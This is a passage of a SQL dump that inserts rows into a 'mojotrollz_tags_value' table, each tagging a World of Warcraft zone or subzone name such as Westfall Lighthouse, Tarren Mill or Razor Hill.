`mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (106, 2, 'The Stockpile', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (107, 2, 'Saldean\'s Farm', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (108, 2, 'Sentinel Hill', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (109, 2, 'Furlbrow\'s Pumpkin Farm', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (111, 2, 'Jangolode Mine', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (113, 2, 'Gold Coast Quarry', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (115, 2, 'Westfall Lighthouse', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (116, 2, 'Misty Valley', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (117, 2, 'Grom\'gol Base Camp', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (118, 2, 'Whelgar\'s Excavation Site', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (120, 2, 'Westbrook Garrison', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (121, 2, 'Tranquil Gardens Cemetery', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (122, 2, 'Zuuldaia Ruins', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (123, 2, 'Bal\'lal Ruins', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (125, 2, 'Kal\'ai Ruins', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (126, 2, 'Tkashi Ruins', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (127, 2, 'Balia\'mah Ruins', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (128, 2, 'Ziata\'jai Ruins', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (129, 2, 'Mizjah Ruins', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (130, 2, 'Silverpine Forest ', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (131, 2, 'Kharanos', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (132, 2, 'Coldridge Valley', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (133, 2, 'Gnomeregan', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (134, 2, 'Gol\'Bolar Quarry', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (135, 2, 'Frostmane Hold', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (136, 2, 'The Grizzled Den', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (137, 2, 'Brewnall Village', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (138, 2, 'Misty Pine Refuge', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (139, 2, 'Eastern Plaguelands', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (141, 2, 'Teldrassil', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (142, 2, 'Ironband\'s Excavation Site ', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (143, 2, 'Mo\'grosh Stronghold', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (144, 2, 'Thelsamar', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (145, 2, 'Algaz Gate', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (146, 2, 'Stonewrought Dam', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (147, 2, 'The Farstrider Lodge', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (148, 2, 'Darkshore', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (149, 2, 'Silver Stream Mine', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (150, 2, 'Menethil Harbor', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (151, 2, 'Designer Island', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (152, 2, 'The Bulwark', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (153, 2, 'Ruins of Lordaeron ', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (154, 2, 'Deathknell', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (155, 2, 'Night Web\'s Hollow', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (156, 2, 'Solliden Farmstead', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (157, 2, 'Agamand Mills', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (158, 2, 'Agamand Family Crypt', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (159, 2, 'Brill', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (160, 2, 'Whispering Gardens', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (161, 2, 'Terrace of Repose', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (162, 2, 'Brightwater Lake', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (163, 2, 'Gunther\'s Retreat', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (164, 2, 'Garren\'s Haunt', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (165, 2, 'Balnir Farmstead', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (166, 2, 'Cold Hearth Manor', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (167, 2, 'Crusader Outpost', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (168, 2, 'The North Coast', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (169, 2, 'Whispering Shore', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (170, 2, 'Lordamere Lake', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (172, 2, 'Fenris Isle', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (173, 2, 'Faol\'s Rest', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (186, 2, 'Dolanaar', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (188, 2, 'Shadowglen', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (189, 2, 'Steelgrill\'s Depot', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (190, 2, 'Hearthglen', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (192, 2, 'Northridge Lumber Camp', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (193, 2, 'Northridge Lumber Camp', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (195, 2, 'School of Necromancy', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (196, 2, 'Uther\'s Tomb', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (197, 2, 'Sorrow Hill', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (198, 2, 'The Weeping Cave', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (199, 2, 'Felstone Field', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (200, 2, 'Dalson\'s Tears', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (201, 2, 'Gahrron\'s Withering', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (202, 2, 'The Writhing Haunt', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (203, 2, 'Mardenholde Keep', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (204, 2, 'Pyrewood Village ', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (205, 2, 'Dun Modr', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (207, 2, 'The Great Sea', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (208, 2, 'Unused Ironcladcove', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (209, 2, 'Shadowfang Keep', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (211, 2, 'Iceflow Lake', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (212, 2, 'Helm\'s Bed Lake', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (213, 2, 'Deep Elem Mine', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (214, 2, 'The Great Sea', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (215, 2, 'Mulgore', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (219, 2, 'Alexston Farmstead', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (220, 2, 'Red Cloud Mesa', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (221, 2, 'Camp Narache', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (222, 2, 'Bloodhoof Village', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (223, 2, 'Stonebull Lake', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (224, 2, 'Ravaged Caravan', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (225, 2, 'Red Rocks', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (226, 2, 'The Skittering Dark', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (227, 2, 'Valgan\'s Field', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (228, 2, 'The Sepulcher', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (229, 2, 'Olsen\'s Farthing', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (230, 2, 'The Greymane Wal', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (231, 2, 'Beren\'s Peril', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (232, 2, 'The Dawning Isles', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (233, 2, 'Ambermill', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (235, 2, 'Fenris Keep', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (236, 2, 'Shadowfang Keep', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (237, 2, 'The Decrepit Ferry', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (238, 2, 'Malden\'s Orchard', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (239, 2, 'The Ivar Patch', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (240, 2, 'The Dead Field', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (241, 2, 'The Rotting Orchard', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (242, 2, 'Brightwood Grove', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (243, 2, 'Forlorn Rowe', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (244, 2, 'The Whipple Estate', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (245, 2, 'The Yorgen Farmstead', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (246, 2, 'The Cauldron', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (247, 2, 'Grimesilt Dig Site', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (249, 2, 'Dreadmaul Rock', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (250, 2, 'Ruins of Thaurissan', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (251, 2, 'Flame Crest', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (252, 2, 'Blackrock Stronghold', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (253, 2, 'The Pillar of Ash', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (254, 2, 'Blackrock Mountain', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (255, 2, 'Altar of Storms', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (256, 2, 'Aldrassil', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (257, 2, 'Shadowthread Cave', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (258, 2, 'Fel Rock', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (259, 2, 'Lake Al\'Ameth', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (260, 2, 'Starbreeze Village', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (261, 2, 'Gnarlpine Hold', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (262, 2, 'Ban\'ethil Barrow Den', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (263, 2, 'The Cleft ', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (264, 2, 'The Oracle Glade', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (265, 2, 'Wellspring River', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (266, 2, 'Wellspring Lake', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (267, 2, 'Hillsbrad Foothills', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (268, 2, 'Azshara Crater', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (269, 2, 'Dun Algaz', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (271, 2, 'Southshore', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (272, 2, 'Tarren Mill', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (275, 2, 'Durnholde Keep', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (276, 2, 'Stonewrought Pass', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (277, 2, 'The Foothill Caverns', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (278, 2, 'Lordamere Internment Camp', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (279, 2, 'Dalaran', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (280, 2, 'Strahnbrad', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (281, 2, 'Ruins of Alterac', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (282, 2, 'Crushridge Hold', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (283, 2, 'Slaughter Hollow', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (284, 2, 'The Uplands', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (285, 2, 'Southpoint Tower', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (286, 2, 'Hillsbrad Fields', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (287, 2, 'Hillsbrad', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (288, 2, 'Azurelode Mine', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (289, 2, 'Nethander Stead', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (290, 2, 'Dun Garok', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (293, 2, 'Thoradin\'s Wall', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (294, 2, 'Eastern Strand', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (295, 2, 'Western Strand', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (297, 2, 'Jaguero Isle', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (298, 2, 'Baradin Bay', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (299, 2, 'Menethil Bay', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (300, 2, 'Misty Reed Strand', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (301, 2, 'The Savage Coast', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (302, 2, 'The Crystal Shore', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (303, 2, 'Shell Beach', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (305, 2, 'North Tide\'s Run', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (306, 2, 'South Tide\'s Run', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (307, 2, 'The Overlook Cliffs', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (308, 2, 'The Forbidding Sea', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (309, 2, 'Ironbeard\'s Tomb', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (310, 2, 'Crystalvein Mine', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (311, 2, 'Ruins of Aboraz', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (312, 2, 'Janeiro\'s Point', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (313, 2, 'Northfold Manor', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (314, 2, 'Go\'Shek Farm', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (315, 2, 'Dabyrie\'s Farmstead', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (316, 2, 'Boulderfist Hall', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (317, 2, 'Witherbark Village', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (318, 2, 'Drywhisker Gorge', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (320, 2, 'Refuge Pointe', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (321, 2, 'Hammerfall', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (322, 2, 'Blackwater Shipwrecks', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (323, 2, 'O\'Breen\'s Camp', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (324, 2, 'Stromgarde Keep', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (325, 2, 'The Tower of Arathor', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (326, 2, 'The Sanctum', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (327, 2, 'Faldir\'s Cove', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (328, 2, 'The Drowned Reef', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (330, 2, 'Thandol Span', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (331, 2, 'Ashenvale', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (332, 2, 'The Great Sea', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (333, 2, 'Circle of East Binding', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (334, 2, 'Circle of West Binding', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (335, 2, 'Circle of Inner Binding', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (336, 2, 'Circle of Outer Binding', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (337, 2, 'Apocryphan\'s Rest', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (338, 2, 'Angor Fortress', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (339, 2, 'Lethlor Ravine', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (340, 2, 'Kargath', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (341, 2, 'Camp Kosh', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (342, 2, 'Camp Boff', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (343, 2, 'Camp Wurg', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (344, 2, 'Camp Cagg', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (345, 2, 'Agmond\'s End', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (346, 2, 'Hammertoe\'s Digsite', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (347, 2, 'Dustbelch Grotto', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (348, 2, 'Aerie Peak', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (349, 2, 'Wildhammer Keep', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (350, 2, 'Quel\'Danil Lodge', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (351, 2, 'Skulk Rock', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (352, 2, 'Zun\'watha', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (353, 2, 'Shadra\'Alor', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (354, 2, 'Jintha\'Alor', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (355, 2, 'The Altar of Zul', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (356, 2, 'Seradane', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (357, 2, 'Feralas', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (358, 2, 'Brambleblade Ravine', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (359, 2, 'Bael Modan', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (360, 2, 'The Venture Co. Mine', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (361, 2, 'Felwood', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (362, 2, 'Razor Hill', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (363, 2, 'Valley of Trials', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (364, 2, 'The Den', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (365, 2, 'Burning Blade Coven', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (366, 2, 'Kolkar Crag', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (367, 2, 'Sen\'jin Village', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (368, 2, 'Echo Isles', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (369, 2, 'Thunder Ridge', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (370, 2, 'Drygulch Ravine', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (371, 2, 'Dustwind Cave', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (372, 2, 'Tiragarde Keep', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (373, 2, 'Scuttle Coast', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (374, 2, 'Bladefist Bay', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (375, 2, 'Deadeye Shore', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (377, 2, 'Southfury River', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (378, 2, 'Camp Taurajo', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (379, 2, 'Far Watch Post', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (380, 2, 'The Crossroads', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (381, 2, 'Boulder Lode Mine', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (382, 2, 'The Sludge Fen', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (383, 2, 'The Dry Hills', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (384, 2, 'Dreadmist Peak', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (385, 2, 'Northwatch Hold', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (386, 2, 'The Forgotten Pools', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (387, 2, 'Lushwater Oasis', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (388, 2, 'The Stagnant Oasis', ''); INSERT INTO `mojotrollz_tags_value` 